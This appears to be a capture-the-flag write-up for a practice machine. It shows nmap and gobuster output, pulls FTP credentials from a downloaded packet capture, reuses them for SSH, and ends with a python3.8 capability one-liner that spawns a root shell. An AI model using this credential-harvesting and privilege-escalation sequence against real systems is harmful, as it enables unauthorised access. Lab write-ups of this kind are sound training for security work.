BOOK THIS SPACE FOR AD
ARTICLE ADHost is up (0.079s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Sun, 06 Jun 2021 02:22:52 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>gobuster dir -u http://10.10.10.245/ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.245/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/data (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip (Status: 200) [Size: 17464]
/capture (Status: 302) [Size: 220] [--> http://10.10.10.245/data/7]
===============================================================
Data dir looks interesting. Let’s check it out.
There are so many files found inside /data directory. after hit and try every file inside directory i found a interesting file called 0.
After downloading it, the file we found is a .pcap one. So we find a wireshark. Then, we apply filter for ftp traffic only, and here we can find username and password.
Fortunately, these are the ones that are useful for ssh as well.
So, now we are logged in as nathan via ssh:
Now, we can read user.txt
Now, use linpeas to gather some more information about this machine.
After analyzing the output I found a capabilities tab that has python3.8
GTFObins will help you to get root:
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'